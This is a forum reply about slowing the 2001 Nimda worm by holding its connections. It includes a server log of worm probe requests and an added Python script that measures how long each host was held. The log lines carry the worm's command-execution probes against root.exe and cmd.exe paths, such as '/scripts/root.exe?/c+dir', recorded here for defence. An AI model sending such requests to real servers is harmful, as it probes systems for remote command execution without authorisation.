Forum OpenACS Q&A: Response to How to bypass rp_filter: Nimba Worm

Posted by Tom Jackson on
The log below demonstrates that holding the attacker definitely slows
them down. Here three separate attackers slowly make their way through
their program:

[18/Sep/2001:19:42:19][4946.9226][-conn0-] Notice: 216.102.228.12 GET /scripts/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:42:21][4946.8201][-sched:11-] Notice: Starting jconn mailto:weblog@pathfinderschool.com/ws
[18/Sep/2001:19:42:21][4946.8201][-sched:11-] Notice: Conn is jabber1 and xmlnode is xode1
[18/Sep/2001:19:42:21][4946.3076][jabpool.1] Notice: In thread 1000867341 :: [139961317]
[18/Sep/2001:19:43:19][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 0 total: 1 released ip: 216.102.228.12
[18/Sep/2001:19:43:21][4946.9226][-conn0-] Notice: 216.43.28.103 GET /scripts/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:43:21][4946.10251][-conn1-] Notice: 216.102.228.12 GET /MSADC/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:44:21][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 1 total: 3 released ip: 216.43.28.103
[18/Sep/2001:19:44:21][4946.10251][-conn1-] Notice: Nimba BreakTrace holding: 0 total: 3 released ip: 216.102.228.12
[18/Sep/2001:19:44:24][4946.9226][-conn0-] Notice: 216.43.28.103 GET /MSADC/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:44:26][4946.10251][-conn1-] Notice: 216.102.228.12 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:45:24][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 1 total: 5 released ip: 216.43.28.103
[18/Sep/2001:19:45:25][4946.9226][-conn0-] Notice: 216.43.28.103 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:45:26][4946.10251][-conn1-] Notice: Nimba BreakTrace holding: 1 total: 6 released ip: 216.102.228.12
[18/Sep/2001:19:45:28][4946.10251][-conn1-] Notice: 216.102.228.12 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:46:25][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 1 total: 7 released ip: 216.43.28.103
[18/Sep/2001:19:46:28][4946.10251][-conn1-] Notice: Nimba BreakTrace holding: 0 total: 7 released ip: 216.102.228.12
[18/Sep/2001:19:46:34][4946.9226][-conn0-] Notice: 216.43.28.103 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:47:14][4946.10251][-conn1-] Notice: 216.70.28.5 GET /scripts/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:47:34][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 1 total: 9 released ip: 216.43.28.103
[18/Sep/2001:19:48:14][4946.10251][-conn1-] Notice: Nimba BreakTrace holding: 0 total: 9 released ip: 216.70.28.5
[18/Sep/2001:19:48:17][4946.9226][-conn0-] Notice: 216.70.28.5 GET /MSADC/root.exe?/c+dir HTTP/1.0
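One way to confirm from such a log that the hold is stretching out each host's scan, as an added example in Python (not part of the original post or of OpenACS): it pairs each GET with the subsequent "released" line for the same IP and reports, per host, how long each request was held and the gap between successive requests. The sample log is a constructed subset of the lines quoted above; the regexes assume the AOLserver notice format shown there.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: a subset of the log lines quoted in the post above.
LOG = """\
[18/Sep/2001:19:42:19][4946.9226][-conn0-] Notice: 216.102.228.12 GET /scripts/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:43:19][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 0 total: 1 released ip: 216.102.228.12
[18/Sep/2001:19:43:21][4946.9226][-conn0-] Notice: 216.43.28.103 GET /scripts/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:43:21][4946.10251][-conn1-] Notice: 216.102.228.12 GET /MSADC/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:44:21][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 1 total: 3 released ip: 216.43.28.103
[18/Sep/2001:19:44:21][4946.10251][-conn1-] Notice: Nimba BreakTrace holding: 0 total: 3 released ip: 216.102.228.12
[18/Sep/2001:19:44:24][4946.9226][-conn0-] Notice: 216.43.28.103 GET /MSADC/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:44:26][4946.10251][-conn1-] Notice: 216.102.228.12 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
"""

# A request line: [timestamp][pid.tid][thread] Notice: <ip> GET <path> ...
REQ = re.compile(r"^\[(?P<ts>[^\]]+)\]\[[^\]]+\]\[[^\]]+\] Notice: "
                 r"(?P<ip>\d+\.\d+\.\d+\.\d+) GET (?P<path>\S+)")
# A release line written when the tarpit lets a held connection go.
REL = re.compile(r"^\[(?P<ts>[^\]]+)\].*Nimba BreakTrace holding: (?P<holding>\d+) "
                 r"total: (?P<total>\d+) released ip: (?P<ip>\S+)$")

def parse_ts(s):
    return datetime.strptime(s, "%d/%b/%Y:%H:%M:%S")

def tarpit_stats(log):
    """Per source IP: number of requests, seconds each was held, and the
    gap in seconds between successive requests from that host."""
    events = defaultdict(list)  # ip -> [(kind, time)] in log order
    for line in log.splitlines():
        m = REQ.match(line) or REL.match(line)
        if m:
            kind = "get" if "path" in m.groupdict() else "rel"
            events[m["ip"]].append((kind, parse_ts(m["ts"])))
    stats = {}
    for ip, evs in events.items():
        holds, gaps, last_get = [], [], None
        for kind, t in evs:
            if kind == "get":
                if last_get is not None:
                    gaps.append((t - last_get).total_seconds())
                last_get = t
            elif last_get is not None:  # release: measure time since its GET
                holds.append((t - last_get).total_seconds())
        stats[ip] = {"requests": sum(1 for k, _ in evs if k == "get"),
                     "holds": holds, "gaps": gaps}
    return stats
```

Every gap in the sample is at least the 60 s hold, which is the slowdown the post is pointing at; a gap well below the hold would mean the host opens parallel connections and the tarpit is only costing it sockets, not time.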